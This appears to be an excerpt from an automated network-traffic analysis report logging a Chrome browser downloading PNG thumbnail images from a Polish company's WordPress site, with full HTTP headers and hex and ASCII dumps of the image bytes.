                                                            2025-01-15 10:08:07 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 01 05 7b b8 3d 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 20 00 49 44 41 54 78 9c ed 9d 09 7c 14 45 fa fe df b9 72 4c 2e 92 70 13 08 97 04 02 48 e4 10 44 45 10 5c 04 75 e5 f4 5a 71 3d 56 e5 f0 c0 15 05 f1 da 75 3d 11 d7 55 d7 03 fd b9 eb ba 8a fe 75 17 10 39 54 c0 0b 95 43 90 4b 90 c3 08 84 1b 42 20 84 64 32 f7 bf 9e 22 9d 9d 84 99 64 3a e9 ce 74 e3 fb cd a7 3f 33 99 e9 a3 a6 fa e9 a7 de aa ae ae b2 07 83 41 32 22 f6 58 27 20 12 9c 30 b5 9c 19 09 db b5 6b 57 b0 6d db b6 f5 39 9e 25 da 15 d5 24 ac be 89 92 fb a0 28 13 d7 e0 a7 72 f5 ea d5 6b cf 3d f7 dc 5e b5 ad d7 e0 09 2b 29 29 e9 19 cd 7a 67 86 f8 1b 12 4e 98 5a 54 27 ac 74 de c3 94 34 e2 2f 55
                                                            Data Ascii: PNGIHDR,{=pHYs.#.#x?v IDATx|ErL.pHDE\uZq=Vu=Uu9TCKB d2"d:t?3A2"X' 0kWm9%$(rk=^+))zgNZT't4/U
                                                            2025-01-15 10:08:07 UTC5636INData Raw: af ea e9 a8 fe b9 f2 3f 0b 4b 05 bf a6 a2 b0 be b0 b0 54 a0 04 a3 91 6e dc 86 bb ea c3 39 45 b8 9b cc a1 df 57 df 2e dc f6 91 5a dd 6b fa bc fa b1 c3 a5 3d d2 0d f0 48 ee 1c 29 bd 2c 2c 15 84 de 03 0b 97 71 b5 65 66 6d 99 af 66 fb 60 98 cf a2 f9 bc 2e ff 87 db a7 21 85 53 1b 67 5c 7f 71 86 61 ce 5c 8c 5a 12 32 0c c3 9c 06 1b 16 c3 30 a6 81 0d 8b 61 18 d3 c0 86 c5 30 8c 69 60 c3 62 18 c6 34 b0 61 31 0c 63 1a d8 b0 18 86 31 0d 6c 58 0c c3 98 06 36 2c 86 61 4c 03 1b 16 c3 30 a6 81 0d 8b 61 18 d3 c0 86 c5 30 8c 69 60 c3 62 18 c6 34 b0 61 31 0c 63 1a d8 b0 18 86 31 0d 6c 58 0c c3 98 06 36 2c 86 61 4c 03 1b 56 c3 63 77 b9 5c 77 15 15 15 0d 2f 29 29 c9 75 bb dd 69 3e 9f cf 19 eb 44 31 b5 e3 70 38 4a e3 e2 e2 4a 52 52 52 36 67 64 64 2c 4a 4c 4c 7c 91 78 a0 f8 06
                                                            Data Ascii: ?KTn9EW.Zk=H),,qefmf`.!Sg\qa\Z20a0i`b4a1c1lX6,aL0a0i`b4a1c1lX6,aLVcw\w/))ui>D1p8JJRRR6gdd,JLL|x


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            127192.168.2.1649188178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:07 UTC656OUTGET /wp-content/uploads/2015/07/selgros_glowna_thumb.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:07 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:07 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:08 GMT
                                                            ETag: "3ebd-620a8b41d30a2"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 16061
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:07 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 01 05 7b b8 3d 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 20 00 49 44 41 54 78 9c ed 9d 07 98 14 45 da c7 df cd cb 66 96 0c 0b 0b 2c b0 04 91 1c 44 05 31 9e 98 48 e6 1c 31 eb a9 9f 7a e6 70 ea a9 e7 99 31 9c 18 50 cc 88 c7 09 8a 28 7a 62 02 91 28 28 48 da 25 c3 ee c2 b2 6c 4e df ff 9d 9a 66 7a 67 7b 76 ba 77 a7 99 6e 78 7f cf d3 cf f4 74 57 57 57 57 bf f5 af b7 aa ab ab a3 6b 6b 6b c9 89 44 87 3b 01 81 90 84 59 e5 e0 48 d8 c6 8d 1b 6b 3b 77 ee dc 94 f3 45 98 0d 68 25 61 4d 4d 94 27 0e 32 99 b8 03 7e 2b 17 2e 5c f8 eb d0 a1 43 07 05 0b 77 c0 13 56 54 54 34 d0 4c b8 83 c3 f8 0f 24 d6 12 96 9d 0d d3 35 5d b0 ea f3 c7 1f a6 83 5a 4b 58 b7 6e 44 b3 67
                                                            Data Ascii: PNGIHDR,{=pHYs.#.#x?v IDATxEf,D1H1zp1P(zb((H%lNfzg{vwnxtWWWWkkkD;YHk;wEh%aMM'2~+.\CwVTT4L$5]ZKXnDg
                                                            2025-01-15 10:08:07 UTC8000INData Raw: b0 7c 1c f5 02 6a c0 fb 94 aa 30 7f fb 05 f7 20 56 55 89 cd 1f 55 37 69 3a 8c ec ce fe b8 71 9f 10 fd 25 03 61 1f 53 61 d9 af f9 63 87 0a 1b cf d5 24 14 29 a6 55 dd f8 77 57 29 df 8a 8d 50 e3 43 a8 d1 59 a8 4e 09 61 5b e2 1c 79 77 f9 ce df fe 1f 44 5f 4d 52 eb 9e ea ab 56 ed 7b e5 3c df 79 f2 50 3d ae 47 d5 99 0f 03 8f f8 9b 0a 1b 8f 56 de b1 93 95 0f f8 32 c2 5e ad 7b 08 e0 d1 27 97 1a 15 e3 1a c3 ca e7 fa 8e fb b0 d8 81 e7 01 04 0f 90 ca 7d fe 9f aa 7e 3d 37 2c 45 2d 13 5e 27 d5 15 85 b0 71 f7 f9 45 06 ff 67 10 57 35 b5 6a 7d 3e 7c af 88 85 2a ac e7 1c 68 19 b6 7f 9c ea 7e f3 81 cf e5 6d 65 e6 c7 2a 07 9b d8 30 ab 55 1c c3 9f f1 c5 cd f1 7a d2 a2 3d a2 f4 9e 27 eb 71 6f 7a 93 bd fb 63 54 da 3d eb 11 de 63 93 bc ff 9b 51 dd 3e 3b 97 75 be bb c6 b0 9e 81
                                                            Data Ascii: |j0 VUU7i:q%aSac$)UwW)PCYNa[ywD_MRV{<yP=GV2^{'}~=7,E-^'qEgW5j}>|*h~me*0Uz='qozcT=cQ>;u
                                                            2025-01-15 10:08:07 UTC126INData Raw: 8b df e8 9a 03 e5 bb d9 f8 42 71 3f cc 3c 9d 95 4e 77 93 88 60 99 87 bd 2b e9 1c 15 ec 40 9a 83 26 11 c1 b2 86 4c c8 26 08 61 44 04 cb 3c ec b6 07 13 2c 2b af 99 84 1a 33 af a8 98 e9 53 21 83 fd 56 fb 90 02 0d c0 34 13 6f b0 be 21 ab e1 cc 60 26 ad 0d ed b3 9a 16 2b 7d 98 82 0e 11 2c f3 b0 51 c9 3b 60 82 10 46 fe 1f f5 78 aa a3 f6 7f 33 7d 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                            Data Ascii: Bq?<Nw`+@&L&aD<,+3S!V4o!`&+},Q;`Fx3}IENDB`


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            128192.168.2.1649189178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:07 UTC654OUTGET /wp-content/uploads/2015/07/pepco_glowna_thumb.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:08 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:07 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:23 GMT
                                                            ETag: "5834-620a8b4fa6071"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 22580
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:08 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 01 05 7b b8 3d 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 20 00 49 44 41 54 78 9c ec 5d 07 60 14 d5 d6 fe 66 66 fb 66 37 3d 01 42 08 a1 77 e9 20 3e e4 09 2a a2 3c 2c a8 60 ef 0a f6 de fb 7b 76 9f f5 d9 78 a2 cf 5e 50 54 54 14 51 50 51 29 3f 55 04 91 16 92 40 42 7a d9 6c 9f 9d f9 cf bd bb 0b 21 24 b0 81 0d bb 0b f3 e9 b0 9b dd 99 3b 67 ef 7c f7 bb e7 dc aa 53 55 15 f1 08 5d ac 0d 68 09 9a 61 ad c5 e1 61 d8 b6 6d db d4 ce 9d 3b 1f cc fd 84 48 4f 6c 8d 61 07 6b 14 4f 03 11 1a 77 c8 1f e5 b2 65 cb 56 0c 1f 3e 7c c8 fe ce 3b e4 86 39 1c 8e c1 91 9c 17 b1 61 e2 bf 16 1d b8 35 8d 30 ff e8 c8 ce 8b 3c c7 76 38 22 3c 51 a1 5f 41 47 40 82 28 28 f4 97 d4 e4
                                                            Data Ascii: PNGIHDR,{=pHYs.#.#x?v IDATx]`fff7=Bw >*<,`{vx^PTTQPQ)?U@Bzl!$;g|SU]haam;HOlakOweV>|;9a50<v8"<Q_AG@((
                                                            2025-01-15 10:08:08 UTC8000INData Raw: 24 d0 88 d5 04 22 55 6b 0a 55 63 6a 45 26 f4 3a 3f ce 1c be 00 4f 4f 7c 05 1d 92 cb 83 04 62 5b 47 b1 da cd db e4 42 01 fb df d9 46 c6 ae 6d 2b f3 8d 3b f0 dd d5 d3 00 2b b0 70 db 10 8c 7d ea 3f 10 33 6a a0 ee aa 3a 23 b0 55 8c df 3a 55 23 16 47 70 1f 24 b5 22 1d 29 16 07 66 5c fc 4f 9c de eb 17 f2 f3 94 e0 33 66 cf 8f bd b2 5d 14 2d fc 54 0a f5 05 5e d5 31 30 ff 8a 9f 13 26 16 3b 37 b4 c1 b0 22 88 9c ac 7b c9 59 e8 5c d5 6d c0 df 33 d6 42 7d e9 68 9c f9 e6 d3 f8 74 cd d1 10 52 6a db fa 07 b7 39 8e 78 62 a9 15 a9 48 36 ba f0 c1 f4 7b 30 a1 fb 52 54 d4 a7 60 d5 ce 9e 98 fa ce 63 58 5b 90 8f 52 47 2a 6a 7d 49 8c 21 c1 0b 84 10 41 18 99 98 ba 88 f4 b7 1c 62 15 91 0d 42 00 26 9d 0f 39 f6 4a 1c 3d 60 15 6e 19 f5 31 06 64 6f 21 75 51 77 6f 94 d7 48 d9 04 c5 b7
                                                            Data Ascii: $"UkUcjE&:?OO|b[GBFm+;+p}?3j:#U:U#Gp$")f\O3f]-T^10&;7"{Y\m3B}htRj9xbH6{0RT`cX[RG*j}I!AbB&9J=`n1do!uQwoH
                                                            2025-01-15 10:08:08 UTC6645INData Raw: 54 82 81 08 d3 00 9f 4e 40 e7 0d 6b 61 e8 de 63 df 29 ca 7e 78 7f 5e 84 d2 73 2e 82 a1 bc 12 5e 2a f0 19 d7 5f 87 d4 e7 9f d9 eb dc c6 0d ec 8d ff 76 7f 3b 1f 3b 26 8c 07 ba f6 46 de c6 d5 10 58 83 77 33 08 17 47 b9 a1 1e ae 0f 3e 46 c5 35 37 c1 18 60 c3 9b 8c 24 1c 32 79 3e 7e d4 d1 2f 49 9b 70 22 32 9e 7b 1a ba 1e 3d 76 4d 05 0c 77 de f1 91 11 74 b8 e6 ce c5 f6 53 4e 47 92 44 21 30 b9 38 1e d5 03 cb e0 21 48 7f e5 79 18 87 0f 63 a3 b9 1a c9 e6 9e 96 ab e4 71 79 e6 7e 83 ed 17 5d 01 b1 ba 0e 16 12 78 51 56 50 eb 72 a2 dd 8b 2f 62 b0 d5 88 e5 97 4f 45 83 de 88 b3 2f 7d 16 cb 72 7b 72 e1 62 8d ed 4a 76 05 16 16 f6 47 97 7b 3f c7 ea fb ce 43 ba a1 8e 8f f7 72 f9 4d d8 e1 c8 00 0c 6a 70 28 47 40 13 9f 43 01 4d b0 e2 12 2a 9f db 16 c8 b5 e3 85 59 4f e0 a2 55
                                                            Data Ascii: TN@kac)~x^s.^*_v;;&FXw3G>F57`$2y>~/Ip"2{=vMwtSNGD!08!Hycqy~]xQVPr/bOE/}r{rbJvG{?CrMjp(G@CM*YOU


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            129192.168.2.1649190178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:07 UTC409OUTGET /wp-content/uploads/2015/07/disney_minnie.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:08 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:07 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:09 GMT
                                                            ETag: "4d9e-620a8b426e4f5"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 19870
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:08 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 00 72 7c 88 ab 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e1 02 1c 16 0d 2a 07 7d b1 99 00 00 20 00 49 44 41 54 78 da ec bd e9 93 e4 c7 79 e7 f7 c9 fc 9d 75 1f 7d 1f d3 3d d3 33 98 19 cc 81 c1 45 90 20 b5 14 25 ca ab 35 29 69 2d 79 43 b6 d6 0a 5b 11 8e 8d d0 0b 1f 6f bc 7e e9 d8 f5 3f e0 b5 2d 47 6c 84 1d 61 af 77 c3 fb 42 2b ad 36 76 29 05 25 11 24 41 10 37 06 98 19 cc 7d 77 4f df d5 5d 77 d5 ef ca 4c bf a8 9a 0b e0 4d 00 04 c9 fc 44 54 a0 67 30 5d f5 ab ac ca ef ef fb 3c f9 e4 93 60 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58
                                                            Data Ascii: PNGIHDR,r|bKGDpHYs.#.#x?vtIME*} IDATxyu}=3E %5)i-yC[o~?-GlawB+6v)%$A7}wO]wLMDTg0]<`X,bX,bX,bX,bX
                                                            2025-01-15 10:08:08 UTC8000INData Raw: 22 f9 56 97 99 cd 12 4f f8 2b 54 16 0a 5c d2 9b dc 34 03 8e 9c 98 40 c9 0c 1c 07 2d 42 4c 30 e0 c9 17 2a 1c 3c 53 60 a3 db e4 6f 5e 7a 89 8b 17 2f f3 95 ff e8 cb e4 72 b6 e6 ca 0a d6 cf 7a 65 f0 7e b2 5d 1b b6 76 1b 04 61 48 ad 58 64 b0 33 e4 da cb 1b 4c 0c 5c 4a 91 c1 4d 5d 84 71 30 3f a0 d2 d9 15 0e 95 2c 4f fc 6a c4 74 bf c8 93 6e 9d c6 56 0b 37 76 71 84 f7 21 5f 75 5f ac ee 6f b5 36 08 02 7c b2 cd 04 2e 4b 8e 9f ae f1 e6 b9 5b 3c ff 9b cf e2 16 5c c6 75 96 48 47 8e 1a de 65 06 47 b8 0f 43 4c 21 c6 ab 85 20 f4 a8 36 4b 1b c3 de 66 0f 39 74 11 3d 90 89 8b a3 e5 87 7a d4 3b 42 52 d0 3e fa f6 10 95 f4 38 f6 6c 99 27 8f 54 71 ef a4 64 d1 10 69 9c 07 96 2d 21 a5 3a 55 a0 a7 3a f8 61 81 fa 42 81 cd ab 4d 1c 25 51 f7 12 f4 ba a2 ba 58 a0 b2 10 32 39 ef b1 79
                                                            Data Ascii: "VO+T\4@-BL0*<S`o^z/rze~]vaHXd3L\JM]q0?,OjtnV7vq!_u_o6|.K[<\uHGeGCL! 6Kf9t=z;BR>8l'Tqdi-!:U:aBM%QX29y
                                                            2025-01-15 10:08:08 UTC3935INData Raw: 39 2e 9f 0e fd 9e b0 1d a6 ad a5 1d 45 09 74 d0 da 7d 5c d7 27 e7 d6 a8 d6 aa 14 67 ab 4c ce cc 30 7c 75 84 91 ab d7 98 9e ca 92 cf 17 b8 3a 72 8d 6a b1 c8 f7 fe e8 65 32 eb 3b 6e 46 bc a6 ae 93 4e c4 48 44 36 73 ed da 08 67 cf 9f 21 6a 5b 34 a7 9a 50 cd f5 31 17 ea c3 c4 68 28 f4 40 a1 a3 61 2b 0d 97 2a b3 1e cc e4 8b 9c 3f 7f 91 e9 5c 9e 48 34 42 b1 38 4b c8 b0 68 6f 6e e5 89 03 4f b2 79 d3 46 9a d3 49 9a 92 09 e2 b1 18 89 68 84 58 2c 42 28 64 a0 6b 3a ba d2 50 9a 86 a6 29 c4 4d 6b 70 ce 49 13 34 46 3e 9f 3f f0 d1 47 1f 1d 7b f6 d9 67 d1 b4 c6 9f 68 9a 9b 35 2b a0 e6 ba 14 66 cb 14 4b 25 3c cf c7 0e 87 49 25 63 73 27 f0 6d 47 b6 1f 04 e4 8b 25 8a c5 32 51 3b 42 3c 66 cf 4d 16 5a 67 b6 5c e1 f4 6f cf f1 eb b7 de 65 70 78 98 f6 f6 36 f6 f6 f7 b3 73 c7 76
                                                            Data Ascii: 9.Et}\'gL0|u:rje2;nFNHD6sg!j[4P1h(@a+*?\H4B8KhonOyFIhX,B(dk:P)MkpI4F>?G{gh5+fK%<I%cs'mG%2Q;B<fMZg\oepx6sv


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            130192.168.2.1649193178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:07 UTC409OUTGET /wp-content/uploads/2015/07/disney_frozen.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:08 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:08 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:16 GMT
                                                            ETag: "519a-620a8b493b7bf"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 20890
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:08 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 00 72 7c 88 ab 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e1 02 1c 16 0f 2c dc 28 76 2e 00 00 20 00 49 44 41 54 78 da ec bd 77 9c 65 57 75 e7 fb dd 27 dd 1c eb 56 b8 b7 62 57 57 77 75 8e ea 20 b5 5a dd 42 28 80 24 40 02 11 6c 24 c0 06 0f 38 60 1b 6c e3 e7 f9 3c 9e 3d 1e 7b 3c 7e 33 cf 06 3c c6 16 60 60 10 1a 82 24 50 40 b9 15 50 4b 6a 75 ce a9 aa bb 2b 75 e5 70 eb e6 70 c2 fb e3 56 55 57 47 e5 c8 fe 7e 3e dd f5 b9 e7 de 93 f6 39 fb 77 d6 5a 7b 9d b5 41 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89
                                                            Data Ascii: PNGIHDR,r|bKGDpHYs.#.#x?vtIME,(v. IDATxweWu'VbWWwu ZB($@l$8`l<={<~3<``$P@PKju+uppVUWG~>9wZ{A"H$D"H$D"H$D"H$D"H$D"H$
                                                            2025-01-15 10:08:08 UTC8000INData Raw: bf 7d 35 5e 6f 02 bb be 86 dd 93 29 92 93 69 6c d3 c1 51 14 dc 2e 2f c7 30 d8 7e bc 8f 86 78 9c 72 30 4e b9 2a c0 0f 9f 79 9a f2 9e fd fc fe 67 a1 2a 0a cd 2d 21 e2 0d d5 40 9e 80 c7 a2 aa a9 86 72 7d 80 ef be 78 94 c1 b1 14 77 6c 9a 43 68 56 20 fe 82 13 6a 00 a1 a0 8f 9e 63 27 78 66 f7 3e 6e ba 6e 03 ee 82 89 21 6c fc 01 cf ab 8c ae 49 a4 60 bd 09 16 d6 4c 23 5a 2a 2d 8d 2d 44 ea bd f4 0f 66 2b 77 f6 d0 30 3b ee bf 97 e5 f1 38 41 97 c0 ed 15 44 e7 c5 49 15 0a 8c 8c 1f c3 19 b1 a8 56 15 34 4d 23 9f 2c f1 ec 0f f6 73 ec b1 28 de 42 06 cb 2e f3 17 7f f9 71 be fe 9d ed e4 e3 73 49 79 34 ca 86 43 43 7d 65 94 29 a2 3a d4 57 d7 13 f2 56 12 35 33 08 c6 4d 1b 2b 1c a2 e0 d6 70 45 12 1c e9 1a e6 ef 7f f8 04 7f f7 b9 eb 59 98 88 9e 65 65 39 8e 83 2d 04 65 60 dc 72
                                                            Data Ascii: }5^o)ilQ./0~xr0N*yg*-!@r}xwlChV jc'xf>nn!lI`L#Z*--Df+w0;8ADIV4M#,s(B.qsIy4CC}e):WV53M+pEYee9-e`r
                                                            2025-01-15 10:08:08 UTC4955INData Raw: 5f 3d 4d db 5b da 5e 0f cc 53 d3 d5 d4 34 c5 2c 3e f1 9f 7e 85 8f fe ee 13 1c fd d1 0b ec 3a b8 97 7c 6e 06 2b e6 61 b4 38 33 02 ac 6b 44 b6 0d 85 19 9f e9 42 85 44 73 9c 20 82 0b 94 68 b0 7d 2a 11 38 0b ad 98 a2 ea 88 b2 28 88 42 43 80 22 34 9a 08 8d 52 16 b6 a5 88 c7 14 e3 23 63 f4 b4 37 5f 54 d4 dc 4c a5 8f bc f7 20 dd 1d 8d 7c f6 cb df e2 f3 8f 7f 8e b7 3f f4 3e f6 be 6b 1f 1d 0d 31 b2 b1 16 b2 6e 23 7f 71 7c 90 7b 76 f7 72 53 83 cd c7 fe e9 3f e6 b7 3e fe fb fc a4 77 3b 7d b7 dd c1 96 b7 6c a6 bd ad 99 99 30 62 ca 2f 50 d4 11 5a 6b 9a dd 04 31 af 95 84 e5 e0 e4 15 7f f5 f9 ef 91 ca e4 f8 37 ff f0 11 f6 dd 76 2b e9 8d 6d 4c d8 21 67 87 22 1a 62 9d 38 91 a2 12 6a 2a d3 45 ca e5 0a 6e 32 85 33 53 a0 b9 29 c5 e6 64 33 15 ed 63 1b 85 0a 0c 09 e5 10 8f 59
                                                            Data Ascii: _=M[^S4,>~:|n+a83kDBDs h}*8(BC"4R#c7_TL |?>k1n#q|{vrS?>w;}l0b/PZk17v+mL!g"b8j*En23S)d3cY


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            131192.168.2.1649191178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:07 UTC416OUTGET /wp-content/uploads/2015/07/disney_thelion_guard.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:08 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:08 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:14 GMT
                                                            ETag: "507e-620a8b471d80e"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 20606
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:08 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 00 72 7c 88 ab 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e1 02 1c 16 11 22 ef d1 64 f6 00 00 20 00 49 44 41 54 78 da ec bd 77 9c 5c 57 79 ff ff 3e e7 b6 a9 db bb 7a b3 64 35 5b 96 2c 17 5c b1 0d d8 d8 26 c4 10 02 a1 85 6f 42 08 21 74 c2 f7 1b 6a 68 36 fc 88 09 35 24 60 02 a1 77 17 c0 36 b8 49 58 2e b2 9a 8b 8a d5 db 36 6d df 9d 9d 99 db ce f9 fd 71 ef ec ae 0c 24 40 8c 1c e0 bc 5f af d1 5e cd de 9d 72 66 ce e7 3e cf 73 9e e7 39 60 30 18 0c 06 83 c1 60 30 18 0c 06 83 c1 60 30 18 0c 06 83 c1 60 30 18 0c 06 83 c1 60 30 18 0c 06 83 c1 60 30 18 0c 06 83 c1 60 30 18 0c 06 83 c1
                                                            Data Ascii: PNGIHDR,r|bKGDpHYs.#.#x?vtIME"d IDATxw\Wy>zd5[,\&oB!tjh65$`w6IX.6mq$@_^rf>s9`0`0`0`0`0`0`0
                                                            2025-01-15 10:08:08 UTC8000INData Raw: 49 01 96 94 08 a1 b1 44 52 0a 24 d2 e7 10 52 62 21 c8 44 31 bd b1 c7 f0 ac c5 58 0b 57 c2 be 23 54 6c 1b c7 b2 19 15 36 cd 99 3c 2f 9a 37 97 5c d7 2c 66 cd 5d c8 e0 dc 85 f8 27 06 e8 0e 23 66 cd 5b c8 27 3e f9 39 e2 27 b6 b3 fd d6 6f b3 42 28 2e 28 7a f8 9a 24 7f 4a 27 19 fd 5a eb 64 35 ad e6 fa c5 89 68 c5 2a d9 3a 2c 4e 5d 44 8d 20 d2 6a ca cd 53 a9 d5 13 21 88 d3 15 44 85 40 09 4d a4 6b 69 0e 0a 84 c0 d2 9a 20 8a 51 8d 4d 2c bb ea 6a f2 eb cf a7 50 5f a4 b1 a1 9e 13 25 9f b1 52 04 56 16 27 e7 92 f1 24 72 72 8c be 27 77 b2 77 db 66 8e ef d8 4e b5 af 97 4c ba 6a 3b b3 1f 97 4e dd 56 c7 12 78 96 84 92 4d cf 91 2a e3 23 61 62 cd 45 0a ad 4c d2 a8 11 ac 53 48 e7 ac 2e 3a 3a ba a0 bc 15 4b 2a 08 34 d8 0a 47 0a 6c db 4a 77 5c 4f 26 bb ab 61 f7 a3 8f b2 e1 d8
